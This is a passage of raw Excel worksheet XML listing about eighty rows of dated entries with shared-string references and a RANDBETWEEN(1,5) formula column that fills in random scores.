    <row r="6970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6970" s="1">
        <v>43423.571342592593</v>
      </c>
      <c r="C6970" t="s">
        <v>10</v>
      </c>
      <c r="D6970" t="s">
        <v>20</v>
      </c>
      <c r="E6970" t="s">
        <v>6193</v>
      </c>
      <c r="F6970">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6971" s="1">
        <v>43423.56453703704</v>
      </c>
      <c r="C6971" t="s">
        <v>154</v>
      </c>
      <c r="D6971" t="s">
        <v>263</v>
      </c>
      <c r="E6971" t="s">
        <v>5719</v>
      </c>
      <c r="F6971">
        <f t="shared" ca="1" si="108"/>
        <v>1</v>
      </c>
    </row>
    <row r="6972" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6972" s="1">
        <v>43423.554351851853</v>
      </c>
      <c r="C6972" t="s">
        <v>10</v>
      </c>
      <c r="D6972" t="s">
        <v>6</v>
      </c>
      <c r="E6972" s="2" t="s">
        <v>6194</v>
      </c>
      <c r="F6972">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6973" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6973" s="1">
        <v>43423.533645833333</v>
      </c>
      <c r="C6973" t="s">
        <v>10</v>
      </c>
      <c r="D6973" t="s">
        <v>151</v>
      </c>
      <c r="E6973" s="2" t="s">
        <v>6195</v>
      </c>
      <c r="F6973">
        <f t="shared" ca="1" si="108"/>
        <v>5</v>
      </c>
    </row>
    <row r="6974" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6974" s="1">
        <v>43423.517384259256</v>
      </c>
      <c r="C6974" t="s">
        <v>10</v>
      </c>
      <c r="D6974" t="s">
        <v>6</v>
      </c>
      <c r="E6974" s="2" t="s">
        <v>6196</v>
      </c>
      <c r="F6974">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6975" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6975" s="1">
        <v>43423.507430555554</v>
      </c>
      <c r="C6975" t="s">
        <v>2104</v>
      </c>
      <c r="E6975" s="2" t="s">
        <v>6197</v>
      </c>
      <c r="F6975">
        <f t="shared" ca="1" si="108"/>
        <v>3</v>
      </c>
    </row>
    <row r="6976" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6976" s="1">
        <v>43423.494525462964</v>
      </c>
      <c r="C6976" t="s">
        <v>10</v>
      </c>
      <c r="D6976" t="s">
        <v>112</v>
      </c>
      <c r="E6976" s="2" t="s">
        <v>6198</v>
      </c>
      <c r="F6976">
        <f t="shared" ca="1" si="108"/>
        <v>4</v>
      </c>
    </row>
    <row r="6977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6977" s="1">
        <v>43423.4843287037</v>
      </c>
      <c r="C6977" t="s">
        <v>173</v>
      </c>
      <c r="E6977" t="s">
        <v>6199</v>
      </c>
      <c r="F6977">
        <f t="shared" ca="1" si="108"/>
        <v>2</v>
      </c>
    </row>
    <row r="6978" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A6978" s="1">
        <v>43423.480138888888</v>
      </c>
      <c r="C6978" t="s">
        <v>10</v>
      </c>
      <c r="D6978" t="s">
        <v>263</v>
      </c>
      <c r="E6978" s="2" t="s">
        <v>6200</v>
      </c>
      <c r="F6978">
        <f t="shared" ref="F6978:F7041" ca="1" si="109">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="6979" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6979" s="1">
        <v>43423.472245370373</v>
      </c>
      <c r="C6979" t="s">
        <v>10</v>
      </c>
      <c r="D6979" t="s">
        <v>178</v>
      </c>
      <c r="E6979" s="2" t="s">
        <v>6201</v>
      </c>
      <c r="F6979">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="6980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6980" s="1">
        <v>43423.455185185187</v>
      </c>
      <c r="C6980" t="s">
        <v>10</v>
      </c>
      <c r="D6980" t="s">
        <v>36</v>
      </c>
      <c r="E6980" t="s">
        <v>6202</v>
      </c>
      <c r="F6980">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="6981" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A6981" s="1">
        <v>43423.444918981484</v>
      </c>
      <c r="C6981" t="s">
        <v>48</v>
      </c>
      <c r="E6981" s="2" t="s">
        <v>6203</v>
      </c>
      <c r="F6981">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="6982" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A6982" s="1">
        <v>43423.437708333331</v>
      </c>
      <c r="C6982" t="s">
        <v>48</v>
      </c>
      <c r="E6982" s="2" t="s">
        <v>6204</v>
      </c>
      <c r="F6982">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="6983" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6983" s="1">
        <v>43423.432453703703</v>
      </c>
      <c r="C6983" t="s">
        <v>163</v>
      </c>
      <c r="E6983" s="2" t="s">
        <v>6205</v>
      </c>
      <c r="F6983">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="6984" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6984" s="1">
        <v>43423.432025462964</v>
      </c>
      <c r="C6984" t="s">
        <v>10</v>
      </c>
      <c r="D6984" t="s">
        <v>6</v>
      </c>
      <c r="E6984" t="s">
        <v>6206</v>
      </c>
      <c r="F6984">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="6985" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A6985" s="1">
        <v>43423.428113425929</v>
      </c>
      <c r="C6985" t="s">
        <v>140</v>
      </c>
      <c r="D6985" t="s">
        <v>234</v>
      </c>
      <c r="E6985" s="2" t="s">
        <v>6207</v>
      </c>
      <c r="F6985">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="6986" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A6986" s="1">
        <v>43423.417013888888</v>
      </c>
      <c r="C6986" t="s">
        <v>48</v>
      </c>
      <c r="E6986" s="2" t="s">
        <v>6208</v>
      </c>
      <c r="F6986">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="6987" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A6987" s="1">
        <v>43423.407789351855</v>
      </c>
      <c r="C6987" t="s">
        <v>471</v>
      </c>
      <c r="E6987" s="2" t="s">
        <v>6209</v>
      </c>
      <c r="F6987">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="6988" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A6988" s="1">
        <v>43423.401030092595</v>
      </c>
      <c r="C6988" t="s">
        <v>10</v>
      </c>
      <c r="D6988" t="s">
        <v>89</v>
      </c>
      <c r="E6988" s="2" t="s">
        <v>6210</v>
      </c>
      <c r="F6988">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="6989" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6989" s="1">
        <v>43423.387719907405</v>
      </c>
      <c r="C6989" t="s">
        <v>65</v>
      </c>
      <c r="D6989" t="s">
        <v>312</v>
      </c>
      <c r="E6989" s="2" t="s">
        <v>6211</v>
      </c>
      <c r="F6989">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="6990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6990" s="1">
        <v>43423.386620370373</v>
      </c>
      <c r="C6990" t="s">
        <v>10</v>
      </c>
      <c r="D6990" t="s">
        <v>86</v>
      </c>
      <c r="E6990" t="s">
        <v>6212</v>
      </c>
      <c r="F6990">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="6991" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6991" s="1">
        <v>43423.373993055553</v>
      </c>
      <c r="C6991" t="s">
        <v>10</v>
      </c>
      <c r="D6991" t="s">
        <v>163</v>
      </c>
      <c r="E6991" s="2" t="s">
        <v>6213</v>
      </c>
      <c r="F6991">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="6992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6992" s="1">
        <v>43423.370219907411</v>
      </c>
      <c r="C6992" t="s">
        <v>41</v>
      </c>
      <c r="E6992" t="s">
        <v>6214</v>
      </c>
      <c r="F6992">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="6993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6993" s="1">
        <v>43423.343460648146</v>
      </c>
      <c r="C6993" t="s">
        <v>197</v>
      </c>
      <c r="E6993" t="s">
        <v>6215</v>
      </c>
      <c r="F6993">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="6994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6994" s="1">
        <v>43423.342743055553</v>
      </c>
      <c r="C6994" t="s">
        <v>10</v>
      </c>
      <c r="D6994" t="s">
        <v>6</v>
      </c>
      <c r="E6994" t="s">
        <v>6216</v>
      </c>
      <c r="F6994">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="6995" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A6995" s="1">
        <v>43423.333831018521</v>
      </c>
      <c r="C6995" t="s">
        <v>6</v>
      </c>
      <c r="D6995" t="s">
        <v>82</v>
      </c>
      <c r="E6995" s="2" t="s">
        <v>6217</v>
      </c>
      <c r="F6995">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="6996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6996" s="1">
        <v>43423.282442129632</v>
      </c>
      <c r="C6996" t="s">
        <v>253</v>
      </c>
      <c r="E6996" t="s">
        <v>6218</v>
      </c>
      <c r="F6996">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="6997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6997" s="1">
        <v>43423.254270833335</v>
      </c>
      <c r="C6997" t="s">
        <v>48</v>
      </c>
      <c r="E6997" t="s">
        <v>6219</v>
      </c>
      <c r="F6997">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="6998" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A6998" s="1">
        <v>43423.220497685186</v>
      </c>
      <c r="C6998" t="s">
        <v>124</v>
      </c>
      <c r="E6998" s="2" t="s">
        <v>6220</v>
      </c>
      <c r="F6998">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="6999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6999" s="1">
        <v>43423.192002314812</v>
      </c>
      <c r="C6999" t="s">
        <v>3443</v>
      </c>
      <c r="E6999" t="s">
        <v>6221</v>
      </c>
      <c r="F6999">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="7000" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A7000" s="1">
        <v>43423.188634259262</v>
      </c>
      <c r="C7000" t="s">
        <v>41</v>
      </c>
      <c r="E7000" s="2" t="s">
        <v>6222</v>
      </c>
      <c r="F7000">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7001" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A7001" s="1">
        <v>43423.098356481481</v>
      </c>
      <c r="C7001" t="s">
        <v>73</v>
      </c>
      <c r="E7001" s="2" t="s">
        <v>5711</v>
      </c>
      <c r="F7001">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7002" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A7002" s="1">
        <v>43423.096631944441</v>
      </c>
      <c r="C7002" t="s">
        <v>253</v>
      </c>
      <c r="E7002" s="2" t="s">
        <v>6223</v>
      </c>
      <c r="F7002">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7003" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A7003" s="1">
        <v>43423.086550925924</v>
      </c>
      <c r="C7003" t="s">
        <v>41</v>
      </c>
      <c r="E7003" s="2" t="s">
        <v>6224</v>
      </c>
      <c r="F7003">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7004" s="1">
        <v>43423.009212962963</v>
      </c>
      <c r="C7004" t="s">
        <v>41</v>
      </c>
      <c r="E7004" t="s">
        <v>6225</v>
      </c>
      <c r="F7004">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7005" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A7005" s="1">
        <v>43422.94908564815</v>
      </c>
      <c r="C7005" t="s">
        <v>139</v>
      </c>
      <c r="E7005" s="2" t="s">
        <v>6226</v>
      </c>
      <c r="F7005">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7006" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A7006" s="1">
        <v>43422.949050925927</v>
      </c>
      <c r="C7006" t="s">
        <v>139</v>
      </c>
      <c r="E7006" s="2" t="s">
        <v>6226</v>
      </c>
      <c r="F7006">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="7007" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A7007" s="1">
        <v>43422.891226851854</v>
      </c>
      <c r="C7007" t="s">
        <v>6</v>
      </c>
      <c r="D7007" t="s">
        <v>25</v>
      </c>
      <c r="E7007" s="2" t="s">
        <v>6227</v>
      </c>
      <c r="F7007">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7008" s="1">
        <v>43422.724745370368</v>
      </c>
      <c r="C7008" t="s">
        <v>885</v>
      </c>
      <c r="E7008">
        <v>905964660</v>
      </c>
      <c r="F7008">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="7009" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A7009" s="1">
        <v>43422.714918981481</v>
      </c>
      <c r="C7009" t="s">
        <v>10</v>
      </c>
      <c r="D7009" t="s">
        <v>52</v>
      </c>
      <c r="E7009" s="2" t="s">
        <v>6228</v>
      </c>
      <c r="F7009">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7010" s="1">
        <v>43422.689305555556</v>
      </c>
      <c r="C7010" t="s">
        <v>60</v>
      </c>
      <c r="F7010">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7011" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A7011" s="1">
        <v>43422.614837962959</v>
      </c>
      <c r="C7011" t="s">
        <v>2210</v>
      </c>
      <c r="D7011" t="s">
        <v>817</v>
      </c>
      <c r="E7011" s="2" t="s">
        <v>6229</v>
      </c>
      <c r="F7011">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="7012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7012" s="1">
        <v>43422.570798611108</v>
      </c>
      <c r="C7012" t="s">
        <v>6230</v>
      </c>
      <c r="D7012" t="s">
        <v>721</v>
      </c>
      <c r="E7012" t="s">
        <v>6231</v>
      </c>
      <c r="F7012">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7013" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A7013" s="1">
        <v>43422.568067129629</v>
      </c>
      <c r="C7013" t="s">
        <v>586</v>
      </c>
      <c r="D7013" t="s">
        <v>56</v>
      </c>
      <c r="E7013" s="2" t="s">
        <v>6232</v>
      </c>
      <c r="F7013">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7014" s="1">
        <v>43422.425567129627</v>
      </c>
      <c r="C7014" t="s">
        <v>1130</v>
      </c>
      <c r="F7014">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="7015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7015" s="1">
        <v>43422.425543981481</v>
      </c>
      <c r="C7015" t="s">
        <v>1130</v>
      </c>
      <c r="F7015">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="7016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7016" s="1">
        <v>43422.425011574072</v>
      </c>
      <c r="C7016" t="s">
        <v>5072</v>
      </c>
      <c r="D7016" t="s">
        <v>7</v>
      </c>
      <c r="E7016" t="s">
        <v>6233</v>
      </c>
      <c r="F7016">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7017" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A7017" s="1">
        <v>43422.420972222222</v>
      </c>
      <c r="C7017" t="s">
        <v>10</v>
      </c>
      <c r="D7017" t="s">
        <v>17</v>
      </c>
      <c r="E7017" s="2" t="s">
        <v>6234</v>
      </c>
      <c r="F7017">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7018" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A7018" s="1">
        <v>43422.367395833331</v>
      </c>
      <c r="C7018" t="s">
        <v>197</v>
      </c>
      <c r="E7018" s="2" t="s">
        <v>6235</v>
      </c>
      <c r="F7018">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7019" s="1">
        <v>43422.349733796298</v>
      </c>
      <c r="C7019" t="s">
        <v>17</v>
      </c>
      <c r="F7019">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7020" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A7020" s="1">
        <v>43422.310520833336</v>
      </c>
      <c r="C7020" t="s">
        <v>71</v>
      </c>
      <c r="D7020" t="s">
        <v>312</v>
      </c>
      <c r="E7020" s="2" t="s">
        <v>6236</v>
      </c>
      <c r="F7020">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7021" s="1">
        <v>43422.289039351854</v>
      </c>
      <c r="C7021" t="s">
        <v>60</v>
      </c>
      <c r="E7021" t="s">
        <v>6237</v>
      </c>
      <c r="F7021">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7022" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7022" s="1">
        <v>43422.258715277778</v>
      </c>
      <c r="C7022" t="s">
        <v>41</v>
      </c>
      <c r="E7022" s="2" t="s">
        <v>6238</v>
      </c>
      <c r="F7022">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="7023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7023" s="1">
        <v>43422.223217592589</v>
      </c>
      <c r="C7023" t="s">
        <v>6239</v>
      </c>
      <c r="D7023" t="s">
        <v>667</v>
      </c>
      <c r="E7023" t="s">
        <v>6240</v>
      </c>
      <c r="F7023">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7024" s="1">
        <v>43422.140648148146</v>
      </c>
      <c r="C7024" t="s">
        <v>60</v>
      </c>
      <c r="E7024" t="s">
        <v>6241</v>
      </c>
      <c r="F7024">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7025" s="1">
        <v>43422.136203703703</v>
      </c>
      <c r="C7025" t="s">
        <v>686</v>
      </c>
      <c r="E7025" t="s">
        <v>6242</v>
      </c>
      <c r="F7025">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="7026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7026" s="1">
        <v>43421.683923611112</v>
      </c>
      <c r="C7026" t="s">
        <v>10</v>
      </c>
      <c r="D7026" t="s">
        <v>6</v>
      </c>
      <c r="E7026" t="s">
        <v>6243</v>
      </c>
      <c r="F7026">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7027" s="1">
        <v>43421.645925925928</v>
      </c>
      <c r="C7027" t="s">
        <v>60</v>
      </c>
      <c r="F7027">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7028" s="1">
        <v>43421.520069444443</v>
      </c>
      <c r="C7028" t="s">
        <v>60</v>
      </c>
      <c r="F7028">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="7029" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A7029" s="1">
        <v>43421.448483796295</v>
      </c>
      <c r="C7029" t="s">
        <v>10</v>
      </c>
      <c r="D7029" t="s">
        <v>52</v>
      </c>
      <c r="E7029" s="2" t="s">
        <v>6244</v>
      </c>
      <c r="F7029">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="7030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7030" s="1">
        <v>43421.414895833332</v>
      </c>
      <c r="C7030" t="s">
        <v>60</v>
      </c>
      <c r="E7030" t="s">
        <v>6245</v>
      </c>
      <c r="F7030">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7031" s="1">
        <v>43421.37164351852</v>
      </c>
      <c r="C7031" t="s">
        <v>2428</v>
      </c>
      <c r="D7031" t="s">
        <v>89</v>
      </c>
      <c r="E7031" t="s">
        <v>6246</v>
      </c>
      <c r="F7031">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7032" s="1">
        <v>43421.156956018516</v>
      </c>
      <c r="C7032" t="s">
        <v>60</v>
      </c>
      <c r="E7032" t="s">
        <v>6247</v>
      </c>
      <c r="F7032">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7033" s="1">
        <v>43420.72965277778</v>
      </c>
      <c r="C7033" t="s">
        <v>10</v>
      </c>
      <c r="D7033" t="s">
        <v>263</v>
      </c>
      <c r="E7033" t="s">
        <v>6248</v>
      </c>
      <c r="F7033">
        <f t="shared" ca="1" si="109"/>
        <v>5</v>
      </c>
    </row>
    <row r="7034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7034" s="1">
        <v>43420.678576388891</v>
      </c>
      <c r="C7034" t="s">
        <v>60</v>
      </c>
      <c r="E7034" t="s">
        <v>6249</v>
      </c>
      <c r="F7034">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="7035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7035" s="1">
        <v>43420.677048611113</v>
      </c>
      <c r="C7035" t="s">
        <v>60</v>
      </c>
      <c r="F7035">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7036" s="1">
        <v>43420.665567129632</v>
      </c>
      <c r="C7036" t="s">
        <v>48</v>
      </c>
      <c r="E7036" t="s">
        <v>6250</v>
      </c>
      <c r="F7036">
        <f t="shared" ca="1" si="109"/>
        <v>4</v>
      </c>
    </row>
    <row r="7037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7037" s="1">
        <v>43420.664687500001</v>
      </c>
      <c r="C7037" t="s">
        <v>10</v>
      </c>
      <c r="D7037" t="s">
        <v>89</v>
      </c>
      <c r="E7037" t="s">
        <v>6251</v>
      </c>
      <c r="F7037">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7038" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A7038" s="1">
        <v>43420.643321759257</v>
      </c>
      <c r="C7038" t="s">
        <v>6</v>
      </c>
      <c r="D7038" t="s">
        <v>194</v>
      </c>
      <c r="E7038" s="2" t="s">
        <v>6252</v>
      </c>
      <c r="F7038">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7039" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A7039" s="1">
        <v>43420.601886574077</v>
      </c>
      <c r="C7039" t="s">
        <v>10</v>
      </c>
      <c r="D7039" t="s">
        <v>80</v>
      </c>
      <c r="E7039" s="2" t="s">
        <v>6253</v>
      </c>
      <c r="F7039">
        <f t="shared" ca="1" si="109"/>
        <v>1</v>
      </c>
    </row>
    <row r="7040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7040" s="1">
        <v>43420.599143518521</v>
      </c>
      <c r="C7040" t="s">
        <v>10</v>
      </c>
      <c r="D7040" t="s">
        <v>6</v>
      </c>
      <c r="E7040" t="s">
        <v>6254</v>
      </c>
      <c r="F7040">
        <f t="shared" ca="1" si="109"/>
        <v>3</v>
      </c>
    </row>
    <row r="7041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7041" s="1">
        <v>43420.546747685185</v>
      </c>
      <c r="C7041" t="s">
        <v>10</v>
      </c>
      <c r="D7041" t="s">
        <v>290</v>
      </c>
      <c r="E7041" t="s">
        <v>6255</v>
      </c>
      <c r="F7041">
        <f t="shared" ca="1" si="109"/>
        <v>2</v>
      </c>
    </row>
    <row r="7042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7042" s="1">
        <v>43420.540694444448</v>
      </c>
      <c r="C7042" t="s">
        <v>41</v>
      </c>
      <c r="E7042" t="s">
        <v>6256</v>
      </c>
      <c r="F7042">
        <f t="shared" ref="F7042:F7105" ca="1" si="110">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="7043" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A7043" s="1">
        <v>43420.530300925922</v>
      </c>
      <c r="C7043" t="s">
        <v>10</v>
      </c>
      <c r="D7043" t="s">
        <v>107</v>
      </c>
      <c r="E7043" s="2" t="s">
        <v>6257</v>
      </c>
      <c r="F7043">
        <f t="shared" ca="1" si="110"/>
        <v>2</v>
      </c>
    </row>
    <row r="7044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7044" s="1">
        <v>43420.523888888885</v>
      </c>
      <c r="C7044" t="s">
        <v>10</v>
      </c>
      <c r="D7044" t="s">
        <v>20</v>
      </c>
      <c r="E7044" t="s">
        <v>6258</v>
      </c>
      <c r="F7044">
        <f t="shared" ca="1" si="110"/>
        <v>3</v>
      </c>
    </row>
    <row r="7045" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A7045" s="1">
        <v>43420.516805555555</v>
      </c>
      <c r="C7045" t="s">
        <v>10</v>
      </c>
      <c r="D7045" t="s">
        <v>11</v>
      </c>
      <c r="E7045" s="2" t="s">
        <v>6259</v>
      </c>
      <c r="F7045">
        <f t="shared" ca="1" si="110"/>
        <v>1</v>
      </c>
    </row>
    <row r="7046" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A7046" s="1">
        <v>43420.51122685185</v>
      </c>
      <c r="C7046" t="s">
        <v>10</v>
      </c>
      <c r="D7046" t="s">
        <v>14</v>
      </c>
      <c r="E7046" s="2" t="s">
        <v>6260</v>
      </c>
      <c r="F7046">
        <f t="shared" ca="1" si="110"/>
        <v>3</v>
      </c>
    </row>
    <row r="7047" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A7047" s="1">
        <v>43420.468425925923</v>
      </c>
      <c r="C7047" t="s">
        <v>10</v>
      </c>
      <c r="D7047" t="s">
        <v>39</v>
      </c>
      <c r="E7047" s="2" t="s">
        <v>6261</v>
      </c>
      <c r="F7047">
        <f t="shared" ca="1" si="110"/>
        <v>4</v>
      </c>
    </row>
    <row r="7048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7048" s="1">
        <v>43420.468113425923</v>
      </c>
      <c r="C7048" t="s">
        <v>10</v>
      </c>
      <c r="D7048" t="s">
        <v>52</v>
      </c>
      <c r="E7048" t="s">
        <v>6262</v>
      </c>
      <c r="F7048">
        <f t="shared" ca="1" si="110"/>
        <v>3</v>
      </c>
    </row>
    <row r="7049" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7049" s="1">
        <v>43420.460844907408</v>
      </c>
      <c r="C7049" t="s">
        <v>10</v>
      </c>
      <c r="D7049" t="s">
        <v>290</v>
      </c>
      <c r="E7049" t="s">
